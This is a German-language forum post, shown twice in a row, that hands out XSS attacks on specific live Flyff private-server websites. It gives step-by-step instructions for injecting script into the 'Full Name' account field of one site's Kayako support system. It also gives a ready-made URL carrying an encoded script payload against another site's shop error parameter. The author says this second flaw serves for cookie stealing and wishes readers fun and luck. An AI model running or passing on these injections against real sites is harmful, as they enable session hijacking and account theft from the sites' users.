Hey Leute =)
Also, als erstes ich hab mir mal fame und nen paar andere seiten unter die Lupe genommen und siehe da, 2mal XSS :)
FlyForFame - Powered By Kayako eSupport
1. Account erstellen (E-Mail ist egal)
2. Einloggen
3. Registerkarte rechts auf " My Account "
4. Bei " Full Name " Script injecten...
Dan gibt es noch eine XSS möglichkeit im CashShop system ;)
Undzwar befindet die sich hier in der index ;)
da es nur ein echo request ist, ist diese XSS nur für Cookie Stealing da.
Code einführung und ende
Decimal Stellen welche übersetz werden in diesem Fall (entspricht: Hiho everybody with this shop in his Site got fucked if he has implemented some coockies =p But the most of them which are using the shop hasn't any pages which are as professional as they use coockies.)
Bsp. Adresse. [URL="http://flyfina.no-ip.biz/shop/index.php?error=index.php?error=%3Cscript%3Ealert%28String.fromCharCode%2872,105,104,111,32,101,118,101,114,121,98,111,100,121,32,119,105,116,104,32,116,104,105,115,32,115,104,111,112,32,105,110,32,104,105,115,32,83,105,116,101,32,103,111,116,32,102,117,99,107,101,100,32,105,102,32,104,101,32,104,97,115,32,105,109,112,108,101,109,101,110,116,101,100,32,115,111,109,101,32,99,111,111,99,107,105,101,115,32,61,112,32,66,117,116,32,116,104,101,32,109,111,115,116,32,111,102,32,116,104,101,109,32,119,104,105,99,104,32,97,114,101,32,117,115,105,110,103,32,116,104,101,32,115,104,111,112,32,104,97,115,110,39,116,32,97,110,121,32,112,97,103,101,115,32,119,104,105,99,104,32,97,114,101,32,97,115,32,112,114,111,102,101,115,115,105,111,110,97,108,32,97,115,32,116,104,101,121,32,117,115,101,32,99,111,111,99,107,105,101,115,46%29%29%3C/script%3E"]Flyfina Flyff ;)[/URL]
Viel Spass + Glück
Also, als erstes ich hab mir mal fame und nen paar andere seiten unter die Lupe genommen und siehe da, 2mal XSS :)
FlyForFame - Powered By Kayako eSupport
1. Account erstellen (E-Mail ist egal)
2. Einloggen
3. Registerkarte rechts auf " My Account "
4. Bei " Full Name " Script injecten...
Dan gibt es noch eine XSS möglichkeit im CashShop system ;)
Undzwar befindet die sich hier in der index ;)
da es nur ein echo request ist, ist diese XSS nur für Cookie Stealing da.
Code einführung und ende
Decimal Stellen welche übersetz werden in diesem Fall (entspricht: Hiho everybody with this shop in his Site got fucked if he has implemented some coockies =p But the most of them which are using the shop hasn't any pages which are as professional as they use coockies.)
Bsp. Adresse. [URL="http://flyfina.no-ip.biz/shop/index.php?error=index.php?error=%3Cscript%3Ealert%28String.fromCharCode%2872,105,104,111,32,101,118,101,114,121,98,111,100,121,32,119,105,116,104,32,116,104,105,115,32,115,104,111,112,32,105,110,32,104,105,115,32,83,105,116,101,32,103,111,116,32,102,117,99,107,101,100,32,105,102,32,104,101,32,104,97,115,32,105,109,112,108,101,109,101,110,116,101,100,32,115,111,109,101,32,99,111,111,99,107,105,101,115,32,61,112,32,66,117,116,32,116,104,101,32,109,111,115,116,32,111,102,32,116,104,101,109,32,119,104,105,99,104,32,97,114,101,32,117,115,105,110,103,32,116,104,101,32,115,104,111,112,32,104,97,115,110,39,116,32,97,110,121,32,112,97,103,101,115,32,119,104,105,99,104,32,97,114,101,32,97,115,32,112,114,111,102,101,115,115,105,111,110,97,108,32,97,115,32,116,104,101,121,32,117,115,101,32,99,111,111,99,107,105,101,115,46%29%29%3C/script%3E"]Flyfina Flyff ;)[/URL]
Viel Spass + Glück